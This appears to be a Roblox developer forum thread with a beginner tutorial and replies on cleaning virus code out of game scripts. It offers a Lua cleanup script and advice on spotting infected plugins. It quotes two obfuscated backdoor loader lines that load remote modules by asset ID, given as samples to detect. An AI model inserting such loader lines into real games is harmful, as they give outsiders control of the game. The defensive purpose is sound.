How to remove the remenants of a virus (for beginners)(without plugins)

if something has spread viruses throughout your game. this is the tutorial for you. remove all the infected files without losing any of your code! (unless you develop viruses then this tutorial is not for you)

it happends to the best of us.
you take a free model, or you download a plugin and boom… viruses everywhere
flling your game with
getfenv()['\144\101\113\117\105\114\101'](5151855975)
or
local loaderFolder = script.Parent local tempFold = game.ServerStorage local SettingsModule = 6500274752 require(SettingsModule):Fire()

this guide won’t help you find the cause of the issue, but it will help you clean up the place after you removed the source.

step1: create a script in workspace.
step2: name it “antivirusscript”
step3: in that script put the virus code you wish to remove from all your scripts
commit the script if needed

we now have a way to detect the virus, now just a way to remove it from all other scripts
to do so we need to run the folowing command in the command bar
i made marks in the command so you can understand what it does

warn("Started") -- shows u that the script is running
local repl={ -- this is a list of special characters for Gsub (so it can identify characters like % and $)
	["%"] = "%%",
	["$"] = "%$",
	["^"] = "%^",
	["*"] = "%*",
	["("] = "%(",
	[")"] = "%)",
	["."] = "%.",
	["]"] = "%]",
	["["] = "%[",
	["+"] = "%+",
	["-"] = "%-",
	["?"] = "%?",
}

new = string.gsub(game.Workspace.antivirusscript.Source,".",repl)-- converts the source of the virusscript to something gsub can handle

for i,v in pairs(game:GetDescendants()) do -- checks everything in game
	suc,mes = pcall (function() -- pcal in case we come across issues or restrictions
		if v:IsA("LuaSourceContainer") then -- checks if the item being inspected is a script, modulescript or localscript
			if v.Name ~= "antivirusscript" and v.Parent ~= workspace then -- skips if it is the script we made
				v.Source = string.gsub(tostring(v.Source),new,"") -- checks the source of the script and replaces all the viruses 
				if v.Source == "" then -- checks if there is still code in the file
					v:Remove() -- deletes the file if there is no code in there
				end
				warn(v) -- to show u that it is a lua container and it is checking the content
				wait() -- to make sure your pc doenst crash
			end
		end
	end)
end

warn("finished") -- to show u it is finished 

remove the script named antivirusscript and you have just removed a virus from your game

First of all, free infected models are rarely an issue. They can only execute code during gameplay, but cannot edit your place. The only 2 things that can actually add or remove instances in your place are users with access and plugins. Any free model viruses will remain in the free model in edit mode and can simply be fixed by deleting the infected asset.

The actual viruses you should be aware of are infected plugins. Plugins can even edit contents of your scripts, embeding malicious code silently without ever creating new instances. Although this is somewhat less of an issue now that Roblox added script permissions, some original plugins still require access to script source, meaning they are easy targets for scammers.

There are much easier and more efficient ways to detect viruses. There are topics already covering this in detail, so I’ll keep it as simple as I can.

1. Verify the plugin’s library page for any suspicious details. Account names that resemble that of the original creator with extra or different characters, obvious bot avatar, late date of upload + too many likes and favorites as well as generally negative likes or not enough reviews.
   For extra security, you can always try searching the plugin’s ID in this thread. Although most entries are already removed by roblox, it is better to remain safe than sorry.

2. Obviously remove and report the infected plugin/model and search for the original. You’ll gain nothing but headaches from keeping it. Identifying infected models and plugins is fairly easy. If it happened after you added/installed something, it’s probably the culprit.

3. Most malicious plugins will store their instances in lesser known services. Tick the following options in studio settings (ALT+S) under the studio tab and search for any scripts stored where they shouldn’t be.
   

4. There are 2 main types of viruses: power viruses and backdoors. Power viruses only exist to cause high CPU usage, making your game unplayable. Backdoors silently create administrative access for their creators. Some of them can be tricky to find, but most contain common code patterns and behaviors.

• Power viruses will almost always show absurdly high script rates in script performance under the view tab.
• Backdoors can be a bit trickier, but are almost always obfuscated or require external modules, making them easily identifiable. Use find all (CTRL+SHIFT+F) and search for getfenv, setfenv and require.

this guide is not about how to prevent viruses from entering your game.
this is for what to do when you have found a virus in multiple scripts and want to remove it from there.
as most of the time, all your scripts are infected or you don’t know what scripts are infected

also, it is not meant as to help you remove the source of the virus but how to clean your place up afterwards

by using the output you ahve the same clearance as any plugin, so it checks hidden services as well

This will only work if the script actually contains code you posted. Some are just plain normal scripts that require an external module and will not be detected by the script you posted. I expanded my reply a bit to cover infection source removal in case people are trying to find more detailed solutions.

see:

yes you do need to know the code

see:

i made this post especialy for those hard to remove strings as the normal way of using gsub wont remove that part of code

not the focus of this tutorial but a welcome addition.

this is pure for “hey i removed the source of the virus, but now i`m left with 10000 infected files” situations

Which is quite a bit of an issue. You need to have a sample code to begin with and it is only effective against viruses that create duplicates of the same code. If only one character is replaced, the code you gave becomes redundant. In addition, find all already has the ability to replace all, so I don’t see why someone wouldn’t use that instead.

Instead of having code that replaces code with questionable effectiveness, you should just search for getfenv and remove all lines that use it. Then go over all code with require in case it also creates unobfuscated lines.

I feel like these arguments are getting stuck in a loop and I’m not sure how to rephrase them in a way to make them more understandable.

that is usually how these kinds of viruses work.
they infect hundreds of files with the same code.
that is what this code is for.
to clean the same line of codes from all your files.
if the case is different either do the steps multiple times for each variant or search another method.

replace all is also a good way to replace lines of code. if you prefer that one go for it.
although small in number sometimes I get 0 finding results with replace
(when i come across an example ill share it)
therefore I looked (and shared) another method

if you have the line… this script will replace it. there is no doubt.
if you want to do it manually yeah go for it, it is more Thorough (assuming hidden files are on). but with 100 of files, it can be a long proses.
the idea is to have this code run and be done with it.

Thanks so much, I downloaded a fake auto rounder plugin for parts in roblox studio, whenever I autorounded a part it contained a script with “Getfenv” in it, so I deleted all of them and the plugin and the virus went away!